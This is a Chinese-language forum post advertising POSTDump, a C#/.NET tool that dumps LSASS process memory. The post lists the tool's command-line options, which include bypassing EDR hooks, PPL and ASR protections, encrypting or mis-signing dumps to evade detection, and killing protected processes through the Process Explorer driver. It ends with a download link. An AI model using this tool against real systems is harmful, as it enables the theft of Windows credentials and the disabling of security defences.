YOLOP0wn Hack分享吧 2023-09-26 08:30 发表于湖南
工具简介 POSTDump是ReactOS minidump函数(如nanodump)的C#/.NET实现,从而避免调用Windows API MiniDumpWriteDump函数,它使用几种技术绕过EDR Hook和PPI保护来执行内存转储(lsass)。
[color=rgba(0, 0, 0, 0.9)]例如NanoDump,您可以对小型转储进行加密或使用无效签名;支持使用ProcExp驱动程序转储/终止受保护的进程。
工具参数 - c:\Temp>PostDump.exe --help
- -o, --output Output filename [default: Machine_datetime.dmp] (fullpath handled)
- -e, --encrypt Encrypt dump in-memory
- -s, --signature Generate invalid Minidump signature
- --snap Use snapshot technic
- --fork Use fork technic [default]
- --elevate-handle Open a handle to LSASS with low privileges and duplicate it to gain higher privileges
- --duplicate-elevate Look for existing lsass handle to duplicate and elevate
- --asr Attempt LSASS dump using ASR bypass (win10/11/2019) (no signature/no encrypt)
- --driver Use Process Explorer driver to open lsass handle (bypass PPL) and dump lsass
- --kill [processID] Use Process Explorer driver to kill process and exit
- --help Display this help screen.
- --version Display version information.
下载地址
https://github.com/YOLOP0wn/POSTDump
| 
发表于 2023-9-27 17:59:31